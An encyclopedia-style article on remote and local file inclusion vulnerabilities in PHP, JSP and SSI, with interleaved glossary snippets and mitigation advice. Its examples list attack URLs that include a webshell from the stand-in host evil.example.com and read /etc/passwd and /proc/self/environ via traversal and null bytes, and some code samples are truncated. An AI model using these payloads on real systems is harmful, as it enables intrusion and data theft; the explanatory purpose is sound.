A file inclusion vulnerability is a type of
web vulnerability
Vulnerability refers to "the quality or state of being exposed to the possibility of being attacked or harmed, either physically or emotionally."
A window of vulnerability (WOV) is a time frame within which defensive measures are diminished, com ...
that is most commonly found to affect
web application
A web application (or web app) is application software that is accessed using a web browser. Web applications are delivered on the World Wide Web to users with an active network connection.
History
In earlier computing models like client-serve ...
s that rely on a scripting
run time. This issue is caused when an application builds a path to executable code using an attacker-controlled variable in a way that allows the attacker to control which file is executed at run time. A file include vulnerability is distinct from a generic
directory traversal attack, in that directory traversal is a way of gaining unauthorized
file system
In computing, file system or filesystem (often abbreviated to fs) is a method and data structure that the operating system uses to control how data is stored and retrieved. Without a file system, data placed in a storage medium would be one lar ...
access, and a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file inclusion vulnerability will result in
remote code execution on the
web server
A web server is computer software and underlying hardware that accepts requests via HTTP (the network protocol created to distribute web content) or its secure variant HTTPS. A user agent, commonly a web browser or web crawler, initi ...
that runs the affected web application. An attacker can use remote code execution to create a
web shell
A web shell is a shell-like interface that enables a web server to be remotely accessed, often for the purposes of cyberattacks. A web shell is unique in that a web browser is used to interact with it.
A web shell could be programmed in any pr ...
on the web server, which can be used for
website defacement.
Types of Inclusion
Remote file inclusion
Remote file inclusion (RFI) occurs when the web application downloads and executes a remote file. These remote files are usually obtained in the form of an
HTTP
The Hypertext Transfer Protocol (HTTP) is an application layer protocol in the Internet protocol suite model for distributed, collaborative, hypermedia information systems. HTTP is the foundation of data communication for the World Wide Web, ...
or
FTP URI as a user-supplied parameter to the web application.
Local file inclusion
Local file inclusion (LFI) is similar to a remote file inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included for execution. This issue can still lead to remote code execution by including a file that contains attacker-controlled data such as the web server's access logs.
Programming languages
PHP
In
PHP
PHP is a General-purpose programming language, general-purpose scripting language geared toward web development. It was originally created by Danish-Canadian programmer Rasmus Lerdorf in 1993 and released in 1995. The PHP reference implementati ...
the main cause is due to the use of unvalidated user-input with a filesystem function that includes a file for execution. Most notable are the
include
and
require
statements. Most of the vulnerabilities can be attributed to novice programmers not being familiar with all of the capabilities of the PHP programming language. The PHP language has a directive which, if enabled, allows filesystem functions to use a
URL
A Uniform Resource Locator (URL), colloquially termed as a web address, is a reference to a web resource that specifies its location on a computer network and a mechanism for retrieving it. A URL is a specific type of Uniform Resource Identifie ...
to retrieve data from remote locations.
The directive is
allow_url_fopen
in PHP versions <= 4.3.4 and
allow_url_include
since PHP 5.2.0. In PHP 5.x this directive is disabled by default, in prior versions it was enabled by default. To exploit the vulnerability an attacker will alter a variable that is passed to one of these functions to cause it to include malicious code from a remote resource. To mitigate this vulnerability all user input needs to be
validated before being used.
Example
Consider this
PHP
PHP is a General-purpose programming language, general-purpose scripting language geared toward web development. It was originally created by Danish-Canadian programmer Rasmus Lerdorf in 1993 and released in 1995. The PHP reference implementati ...
script which includes a file specified by request:
language')
?>
The developer intended to read in
english.php
or
french.php
, which will alter the application's behavior to display the language of the user's choice. But it is possible to inject another path using the
language
parameter.
*
/vulnerable.php?language=http://evil.example.com/webshell.txt?
- injects a remotely hosted file containing a malicious code (remote file include)
*
/vulnerable.php?language=C:\\ftp\\upload\\exploit
- Executes code from an already uploaded file called
exploit.php
(local file inclusion vulnerability)
*
/vulnerable.php?language=C:\\notes.txt%00
- example using
NULL meta character
A metacharacter is a character that has a special meaning to a computer program, such as a shell interpreter or a regular expression (regex) engine.
In POSIX extended regular expressions, there are 14 metacharacters that must be ''escaped'' (prec ...
to remove the
.php
suffix, allowing access to files other than
.php
. This use of null byte injection was patched in PHP 5.3, and can no longer be used for LFI/RFI attacks.
*
/vulnerable.php?language=../../../../../etc/passwd%00
- allows an attacker to read the contents of the
/etc/passwd
file on a
Unix-like
A Unix-like (sometimes referred to as UN*X or *nix) operating system is one that behaves in a manner similar to a Unix system, although not necessarily conforming to or being certified to any version of the Single UNIX Specification. A Unix-li ...
system through a
directory traversal attack.
*
/vulnerable.php?language=../../../../../proc/self/environ%00
- allows an attacker to read the contents of the
/proc/self/environ
file on a
Unix-like
A Unix-like (sometimes referred to as UN*X or *nix) operating system is one that behaves in a manner similar to a Unix system, although not necessarily conforming to or being certified to any version of the Single UNIX Specification. A Unix-li ...
system through a
directory traversal attack. An attacker can modify a
HTTP
The Hypertext Transfer Protocol (HTTP) is an application layer protocol in the Internet protocol suite model for distributed, collaborative, hypermedia information systems. HTTP is the foundation of data communication for the World Wide Web, ...
header (such as
User-Agent
) in this attack to be PHP code to exploit
remote code execution.
The best solution in this case is to use a whitelist of accepted language parameters. If a strong method of input validation such as a whitelist cannot be used, then rely upon input filtering or validation of the passed-in path to make sure it does not contain unintended characters and character patterns. However, this may require anticipating all possible problematic character combinations. A safer solution is to use a predefined Switch/Case statement to determine which file to include rather than use a URL or form parameter to dynamically generate the path.
JavaServer Pages (JSP)
JavaServer Pages
Jakarta Server Pages (JSP; formerly JavaServer Pages) is a collection of technologies that helps software developers create dynamically generated web pages based on HTML, XML, SOAP, or other document types. Released in 1999 by Sun Microsystems, J ...
(JSP) is a scripting language which can include files for execution at runtime.
Example
The following script is vulnerable to a file inclusion vulnerability:
<%
String p = request.getParameter("p");
@include file="<%="includes/" + p +".jsp"%>"
%>
*
/vulnerable.jsp?p=../../../../var/log/access.log%00
- Unlike PHP, JSP is still affected by Null byte injection, and this param will execute JSP commands found in the web server's access log.
Server Side Includes (SSI)
A
Server Side Include
Server Side Includes (SSI) is a simple interpreted server-side scripting language used almost exclusively for the World Wide Web. It is most useful for including the contents of one or more files into a web page on a web server (see below), using ...
is very uncommon and are not typically enabled on a default web server. A server-side include can be used to gain remote code execution on a vulnerable web server.
Example
The following code is vulnerable to a remote-file inclusion vulnerability:
Test file
The above code is not an
XSS vulnerability, but rather including a new
file to be executed by the server.
See also
*
Attack (computing)
A cyberattack is any offensive maneuver that targets computer information systems, computer networks, infrastructures, or personal computer devices. An attacker is a person or process that attempts to access data, functions, or other restricte ...
*
Code injection
*
Metasploit Project, an open-source penetration testing tool that includes tests for RFI
*
SQL injection
In computing, SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL inj ...
*
Threat (computer)
In computer security, a threat is a potential negative action or event facilitated by a vulnerability that results in an unwanted impact to a computer system or application.
A threat can be either a negative "intentional" event (i.e. hacking: a ...
*
w3af, an open-source
web application security scanner
*
Default Credential vulnerability
References
{{reflist, 33em
External links
Remote File Inclusionat the Web Application Security Consortium
Local File InclusionLocal & Remove File Inclusion WordPressat WP Hacked Help
Injection exploits
Web security exploits